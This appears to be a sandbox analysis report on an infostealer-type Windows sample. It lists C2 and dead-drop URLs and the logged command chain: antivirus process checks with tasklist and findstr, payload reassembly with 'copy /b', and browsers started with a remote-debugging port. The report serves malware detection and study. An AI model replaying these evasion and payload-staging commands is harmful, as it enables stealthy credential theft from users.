            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
            Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://sb.scorecardresearch.com/
            Source: Participating.com, 0000000B.00000002.2640138284.000000000018A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://sedone.online
            Source: Participating.com, 0000000B.00000002.2646862298.0000000004B6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sedone.online/
            Source: Participating.com, 0000000B.00000002.2645577381.0000000001A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sedone.online/#
            Source: Participating.com, 0000000B.00000002.2645577381.0000000001A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sedone.online/.online/eCrashp
            Source: Participating.com, 0000000B.00000002.2646862298.0000000004B6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sedone.online/2)
            Source: Participating.com, 0000000B.00000002.2645577381.0000000001A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sedone.online/7
            Source: Participating.com, 0000000B.00000002.2646862298.0000000004B6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sedone.online/I
            Source: Participating.com, 0000000B.00000002.2646862298.0000000004B6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sedone.online/N
            Source: Participating.com, 0000000B.00000002.2646862298.0000000004B6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sedone.online/c
            Source: Participating.com, 0000000B.00000002.2645577381.0000000001A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sedone.online/es
            Source: Participating.com, 0000000B.00000002.2646862298.0000000004B6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sedone.online/j
            Source: Participating.com, 0000000B.00000002.2645577381.0000000001A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sedone.online/s
            Source: Participating.com, 0000000B.00000002.2645577381.0000000001A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sedone.online/sts
            Source: Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://sedone.online4WT2
            Source: Participating.com, 0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://sedone.online58eafcad35J-Disposition:
            Source: Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://sedone.online58eafcad35nt-Disposition:
            Source: Participating.com, 0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://sedone.online6FCB
            Source: Participating.com, 0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2640138284.00000000001B9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://sedone.online;
            Source: Participating.com, 0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://sedone.onlineD2DJ
            Source: Participating.com, 0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://sedone.onlineIW4WT2ontent-Disposition:
            Source: Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://sedone.onlineOHDJMContent-Disposition:
            Source: Participating.com, 0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://sedone.onlinea
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
            Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://srtb.msn.cn/
            Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://srtb.msn.com/
            Source: chrome.exe, 00000011.00000003.2058254143.00006C7800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: chrome.exe, 00000011.00000003.2058189996.00006C7802C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2058164246.00006C7802BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054032537.00006C7802BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054252694.00006C780234C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2058221211.00006C780235C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
            Source: Participating.com, 0000000B.00000003.1819474121.0000000005326000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2645577381.0000000001A90000.00000004.00000020.00020000.00000000.sdmp, Participating.com, 0000000B.00000003.1819368005.0000000001A94000.00000004.00000020.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2645190328.00000000019EA000.00000004.00000020.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2640138284.0000000000131000.00000040.00001000.00020000.00000000.sdmp, Participating.com, 0000000B.00000003.1819334467.0000000004D44000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2646862298.0000000004AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199807592927
            Source: Participating.com, 0000000B.00000002.2646862298.0000000004AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199807592927d0wntgMozilla/5.0
            Source: Participating.com, 0000000B.00000002.2655180675.0000000007146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: Participating.com, 0000000B.00000002.2655180675.0000000007146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: Participating.com, 0000000B.00000003.1819045147.0000000004AD1000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000003.1819368005.0000000001A94000.00000004.00000020.00020000.00000000.sdmp, Participating.com, 0000000B.00000003.1819623479.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000003.1819087105.0000000004B8D000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000003.1819154972.0000000001AB8000.00000004.00000020.00020000.00000000.sdmp, Participating.com, 0000000B.00000003.1819396771.0000000004B8D000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000003.1819667540.0000000001A06000.00000004.00000020.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2645190328.00000000018E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
            Source: Participating.com, 0000000B.00000003.1819474121.0000000005326000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2645577381.0000000001A90000.00000004.00000020.00020000.00000000.sdmp, Participating.com, 0000000B.00000003.1819368005.0000000001A94000.00000004.00000020.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2645190328.00000000019EA000.00000004.00000020.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2646862298.0000000004B0D000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2640138284.0000000000131000.00000040.00001000.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2640138284.000000000018A000.00000040.00001000.00020000.00000000.sdmp, Participating.com, 0000000B.00000003.1819334467.0000000004D44000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2646862298.0000000004AD0000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2645190328.00000000018E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/detct0r
            Source: Participating.com, 0000000B.00000002.2645190328.00000000018E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/detct0r8
            Source: Participating.com, 0000000B.00000002.2646862298.0000000004AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/detct0rd0wntgMozilla/5.0
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://tidal.com/
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://twitter.com/
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://vibe.naver.com/today
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
            Source: Participating.com, 0000000B.00000002.2646862298.0000000004B0D000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2646862298.0000000004B62000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2640138284.000000000018A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://web.telegram.org/
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://web.whatsapp.com
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
            Source: Participating.com, 0000000B.00000002.2649991672.0000000005050000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004D2C000.00000004.00000800.00020000.00000000.sdmp, PH4O89.11.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
            Source: Pizza.0.dr, Participating.com.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://www.deezer.com/
            Source: Participating.com, 0000000B.00000002.2647629721.0000000004CE2000.00000004.00000800.00020000.00000000.sdmp, DBAI5P.11.drString found in binary or memory: https://www.ecosia.org/newtab/
            Source: Participating.com.2.drString found in binary or memory: https://www.globalsign.com/repository/0
            Source: chrome.exe, 00000011.00000003.2058254143.00006C7800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
            Source: chrome.exe, 00000011.00000003.2058254143.00006C7800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: chrome.exe, 00000011.00000003.2058254143.00006C7800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: chrome.exe, 00000011.00000003.2030954255.00006C7800C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
            Source: content.js.23.dr, content_new.js.23.drString found in binary or memory: https://www.google.com/chrome
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
            Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49712 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.8:49713 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.8:49805 version: TLS 1.2
            Source: C:\Users\user\Desktop\nB52P46OJD.exe Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com Code function: 11_2_00D5F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com Code function: 11_2_00D5F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
            Source: C:\Users\user\Desktop\nB52P46OJD.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com Code function: 11_2_00D79FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com Code function: 11_2_00D54763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com Code function: 11_2_00D41B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\nB52P46OJD.exe Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com Code function: 11_2_00D4F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
            Source: C:\Users\user\Desktop\nB52P46OJD.exe File created: C:\Windows\RankedImagination
            Source: C:\Users\user\Desktop\nB52P46OJD.exe Code function: String function: 004062CF appears 57 times
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com Code function: String function: 00CFFD52 appears 40 times
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com Code function: String function: 00D00DA0 appears 46 times
            Source: nB52P46OJD.exe Static PE information: invalid certificate
            Source: nB52P46OJD.exe, 00000000.00000002.1402250119.0000000000980000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs nB52P46OJD.exe
            Source: nB52P46OJD.exe, 00000000.00000003.1400977837.0000000000980000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs nB52P46OJD.exe
            Source: nB52P46OJD.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: RIMOH4.11.dr Binary string: #WriteOfflineHivesTerminateSetupModuleds\security\cryptoapi\cryptosetup\cryptosetup.cDCryptoSetup module terminatedCryptoSetupNewRegistryCallBackCryptoSetup EntropyWrite given invalid event typeCryptoSetup EntropyWrite given invalid event data sizeWriteEntropyToNewRegistryCryptoSetup failed to get Ksecdd entropy %08xRNGCryptoSetup failed to open system hive key %08xExternalEntropyCryptoSetup failed to write entropy into the system hive %08xCryptoSetup failed to close system hive key %08xCryptoSetup succeeded writing entropy key\Device\KsecDDWriteCapiMachineGuidCryptoSetup failed get entropy from ksecdd for CAPI machine guid %08x%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02xCryptoSetup failed to convert CAPI machine guid to string %08xMicrosoft\CryptographyCryptoSetup failed get open/create reg key for CAPI machine guid %08xMachineGuidCryptoSetup failed get write CAPI machine guid %08xCryptoSetup assigned CAPI machine guid "%s"
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@82/299@21/15
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com Code function: 11_2_00D541FA GetLastError,FormatMessageW
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com Code function: 11_2_00D42010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com Code function: 11_2_00D41A0B AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\Desktop\nB52P46OJD.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com Code function: 11_2_00D4DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\nB52P46OJD.exe Code function: 0_2_004024FB CoCreateInstance
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com Code function: 11_2_00D53A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ZWG5VOTQ.htm
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
            Source: C:\Users\user\Desktop\nB52P46OJD.exe File created: C:\Users\user\AppData\Local\Temp\nsa8BAE.tmp
            Source: nB52P46OJD.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\Desktop\nB52P46OJD.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: TRQIE37YC.11.dr, XBS2D2V3W.11.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: nB52P46OJD.exeReversingLabs: Detection: 18%
            Source: nB52P46OJD.exeString found in binary or memory: 3http://crl.usertrust.com/AddTrustExternalCARoot.crl05
            Source: C:\Users\user\Desktop\nB52P46OJD.exeFile read: C:\Users\user\Desktop\nB52P46OJD.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\nB52P46OJD.exe "C:\Users\user\Desktop\nB52P46OJD.exe"
            Source: C:\Users\user\Desktop\nB52P46OJD.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmd
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 615578
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "applied" Manually
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Saddam + ..\Intro + ..\Perfectly + ..\Robertson + ..\Warm w
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\615578\Participating.com Participating.com w
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2524 --field-trial-handle=2184,i,9525037669087929347,3886013468471242407,262144 /prefetch:8
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2792 --field-trial-handle=2572,i,5816379547716917,6542547351342202876,262144 /prefetch:3
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2828 --field-trial-handle=2804,i,4544604587699673004,14473688418498939934,262144 /prefetch:3
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6452 --field-trial-handle=2804,i,4544604587699673004,14473688418498939934,262144 /prefetch:8
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6620 --field-trial-handle=2804,i,4544604587699673004,14473688418498939934,262144 /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
